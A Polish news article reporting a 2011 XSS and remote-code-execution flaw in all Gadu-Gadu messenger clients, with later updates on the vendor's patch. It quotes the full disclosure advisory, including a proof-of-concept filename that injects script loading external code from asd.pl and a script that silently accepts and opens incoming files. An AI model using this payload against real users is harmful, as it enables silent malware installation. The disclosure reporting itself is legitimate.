Luka we wszystkich klientach Gadu-Gadu

Kacper Szcześniak zgłosił na liście Seclists.org poważną lukę w komunikatorze Gadu-Gadu. Może ona zostać wykorzystana do przejęcia kontroli nad komputerem użytkownika.Jak czytamy w wiadomości przesłanej przez Szcześniaka, Gadu-Gadu nieprawidłowo obsługuje żądania dotyczące transferu plików. Wystarczy umieścić w nazwie materiału krótki kod HTML, aby móc za jego pomocą zaatakować program i wymusić na przykład zapisanie czy uruchomienie dowolnego pliku w komputerze gospodarza. W ten sposób cyberprzestępca może na przykład bez wiedzy użytkownika zamieścić niebezpieczne oprogramowanie. Ponieważ problem dotyczy JavaScriptu, zabezpieczenia typu ASLR czy DEP nie pomagają. Nie jest wymagany nawet udział użytkownika. Na poparcie swoich obserwacji Szcześniak zamieścił krótki exploit, za pomocą którego pobierany jest zewnętrzny kod. Warto zaznaczyć, że zgłoszony błąd dotyczy wszystkich oficjalnych wersji klienta Gadu-Gadu. Na ataki nie są natomiast podatni użytkownicy alternatywnych rozwiązań takich jak na przykład AQQ, Tlen czy WTW. Twórca klienta Gadu-Gadu jak dotąd nie wypowiedział się na temat wykrytej luki. function showSpoiler(obj) { var inner = obj.parentNode.getElementsByTagName("div")[0]; if (inner.style.display == "none") inner.style.display = ""; else inner.style.display = "none"; } Vendor: Gadu-Gadu (http://gadu-gadu.pl)Vulnerable Version: AllVulnerability Type: XSS, Remote Code ExecutionRisk level: Very HighCredit: Kacper Szczesniak <kacper3.14 () gmail com>Vulnerability Details:Gadu-Gadu improperly handles file transfer requests. It's possible toplace 255 chars of HTML code (no slash) inside the filename. This canlead to injecting JavaScript into UI using crafted file-send-requestpacket. It's possible to trigger various actions from GUI JavaScriptcode such as saving and running any file on victim's host. Internalprotocols are abused for these purposes. No 'security' mechanisms likeASLR or DEP will stop this attack because it's JS code. No userinteraction needed.PoC:file name that loads external x.js code:<input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"autofocus>example x.js code to hide, accept and open every file request:document.getElementById('extra').innerHTML = '<style>.file,.entrySeparator{display:none;}</style>';n = document.getElementById('open_file');n.setAttribute('id', '');function ff(){ if(f = document.getElementById('open_file')) { e = document.createEvent("HTMLEvents"); e.initEvent('click', true, true); f.dispatchEvent(e); f.setAttribute('id', ''); } setTimeout('ff()', 1000);}ff();Now you can just send any file and it'll be silently auto-download and executedkacper Przypomnijmy, że w GG 10 znaleziono już wcześniej podobne błędy. Zalecamy tymczasowe skorzystanie z alternatywnych klientów sieci Gadu-Gadu. Aktualizacja 26.05.2011 Luka została załatana po stronie serwera. Zostanie dodatkowo opublikowana wersja poprawkowa z dodatkowym zabezpieczeniem po stronie klienta. Natychmiast po otrzymaniu zgłoszenia przystąpiliśmy do intensywnych prac, aby znaleźć zagrożenie i wprowadzić poprawkę tak szybko, jak to możliwe. I mam świeżą dobrą informację - w kilka godzin udało nam się już wdrożyć poprawkę, załatała ona dziurę w bezpieczeństwie - mówi Jarosław Rybus, rzecznik prasowy GG Network Aktualizacja 2 26.05.2011 GG Network udostępniło już testowo kolejną wersję Gadu-Gadu 10.5.1, która dodatkowo łata lukę po stronie klienta. Źródło: SecLists, Dobre Programy, własne, Dziennik Internatów  - Luka we wszystkich klientach Gadu-Gadu